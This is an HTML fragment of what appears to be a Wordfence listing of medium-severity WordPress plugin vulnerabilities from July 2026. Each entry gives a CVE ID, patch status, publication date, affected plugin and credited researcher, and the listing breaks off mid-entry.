<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca14ec54-0864-47f7-9653-1fe04e2875de" target="_blank" rel="noopener">PixelYourSite &lt;= 11.2.1 &#8211; Unauthenticated Sensitive Information Exposure via Order-Received Endpoint Missing Key Validation</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18059" target="_blank" rel="noopener noreferrer">							CVE-2026-18059						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite" target="_blank" rel="noopener">PixelYourSite – Your smart PIXEL (TAG) &amp; API Manager</a> <span class="wfvr-software-slug">[pixelyoursite]</span></div>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite-pro" target="_blank" rel="noopener">PixelYourSite Pro – Your smart PIXEL (TAG) Manager</a> <span class="wfvr-software-slug">[pixelyoursite-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d8e6822edce0e2861e1ce160f4975e34.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8e6822edce0e2861e1ce160f4975e34"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yongtae-jeon" target="_blank" rel="noopener">Win3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca14ec54-0864-47f7-9653-1fe04e2875de" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3af5f238-9b2f-47d0-89e6-30ac09227041" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt; 6.0.9.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15257" target="_blank" rel="noopener noreferrer">							CVE-2026-15257						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3af5f238-9b2f-47d0-89e6-30ac09227041" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4eeb13-869d-47ba-a2d3-73886abc1e03" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login &lt; 6.0.9.4 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15255" target="_blank" rel="noopener noreferrer">							CVE-2026-15255						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</a> <span class="wfvr-software-slug">[custom-registration-form-builder-with-submission-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f33b59d9d341b7f561c1e475646aaeb5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f33b59d9d341b7f561c1e475646aaeb5"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonatan-buskila" target="_blank" rel="noopener">Jonatan Buskila</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd4eeb13-869d-47ba-a2d3-73886abc1e03" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f719a2de-edb1-460e-8efd-fc2ca7fa5245" target="_blank" rel="noopener">ShopLentor Pro &lt;= 2.8.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61972" target="_blank" rel="noopener noreferrer">							CVE-2026-61972						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">ShopLentor Pro</a> <span class="wfvr-software-slug">[woolentor-addons-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f719a2de-edb1-460e-8efd-fc2ca7fa5245" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a442498-0f80-4373-a90c-155966c04945" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer &lt;= 7.14.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65542" target="_blank" rel="noopener noreferrer">							CVE-2026-65542						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">Social Share, Social Login and Social Comments Plugin – Super Socializer</a> <span class="wfvr-software-slug">[super-socializer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8e4cd282e790f13211a36b16698009cb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8e4cd282e790f13211a36b16698009cb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-dinh-hai-haind" target="_blank" rel="noopener">Nguyen Dinh Hai (HaiND)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a442498-0f80-4373-a90c-155966c04945" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf863ce-743e-45d0-9113-e1eb8b2e8440" target="_blank" rel="noopener">Staff Training &lt;= 1.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65541" target="_blank" rel="noopener noreferrer">							CVE-2026-65541						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/staff-training" target="_blank" rel="noopener">Staff Training</a> <span class="wfvr-software-slug">[staff-training]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf863ce-743e-45d0-9113-e1eb8b2e8440" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d4c009-d969-49bb-a56b-a704e5f89a86" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Missing Authorization to Unauthenticated Arbitrary Plugin Settings Modification via bogo_category_msg_create AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13110" target="_blank" rel="noopener noreferrer">							CVE-2026-13110						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d4c009-d969-49bb-a56b-a704e5f89a86" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e07c9c-7d35-41b4-aaa1-f37c4f10f7ac" target="_blank" rel="noopener">StoreGrowth: Smart Sales Booster for WooCommerce | BOGO, Upsells, Direct Checkout, Quick View, Side Cart &lt;= 2.1.0 &#8211; Missing Authorization to Unauthenticated Options Update via create_popup AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15411" target="_blank" rel="noopener noreferrer">							CVE-2026-15411						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1e07c9c-7d35-41b4-aaa1-f37c4f10f7ac" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33e94bb9-71e4-4af8-aa8d-5972b5be1aea" target="_blank" rel="noopener">Thrive Leads Version &lt;= 10.9.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65435" target="_blank" rel="noopener noreferrer">							CVE-2026-65435						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-leads" target="_blank" rel="noopener">Thrive Leads</a> <span class="wfvr-software-slug">[thrive-leads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dave-jong" target="_blank" rel="noopener">Dave Jong</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33e94bb9-71e4-4af8-aa8d-5972b5be1aea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d191211-d02b-4808-8d92-c9a906117cde" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor &lt;= 3.0.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25403" target="_blank" rel="noopener noreferrer">							CVE-2026-25403						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</a> <span class="wfvr-software-slug">[ultimate-store-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d191211-d02b-4808-8d92-c9a906117cde" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16a4665a-df79-4def-8215-df44dffdd332" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor &lt;= 3.16.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66701" target="_blank" rel="noopener noreferrer">							CVE-2026-66701						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</a> <span class="wfvr-software-slug">[profile-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16a4665a-df79-4def-8215-df44dffdd332" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60878165-d4cc-4ea1-acf7-9bb6fd48795b" target="_blank" rel="noopener">W3 Total Cache &lt;= 2.10.2 &#8211; Unauthenticated Path Traversal</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66695" target="_blank" rel="noopener noreferrer">							CVE-2026-66695						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">W3 Total Cache</a> <span class="wfvr-software-slug">[w3-total-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/807a1a84f7f8e0b4eb76852c9e02e21d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="807a1a84f7f8e0b4eb76852c9e02e21d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mykel-nelson" target="_blank" rel="noopener">Mykel Nelson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60878165-d4cc-4ea1-acf7-9bb6fd48795b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2919bbc-c4c2-4b52-90ec-2471218cd7d1" target="_blank" rel="noopener">WooCommerce PayPal Payments &lt;= 3.3.2 &#8211; Unauthenticated Sensitive Information Disclosure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-14073" target="_blank" rel="noopener noreferrer">							CVE-2025-14073						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments" target="_blank" rel="noopener">WooCommerce PayPal Payments</a> <span class="wfvr-software-slug">[woocommerce-paypal-payments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dfb3a6a61ca4c3b3c0b1dc68fdb21953.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dfb3a6a61ca4c3b3c0b1dc68fdb21953"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/drew-webber" target="_blank" rel="noopener">Drew Webber (mcdruid)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a2919bbc-c4c2-4b52-90ec-2471218cd7d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc167f44-4b1c-4597-9c9b-61064044bcdb" target="_blank" rel="noopener">WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) &lt; 1.10.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14305" target="_blank" rel="noopener noreferrer">							CVE-2026-14305						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</a> <span class="wfvr-software-slug">[delicious-recipes]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
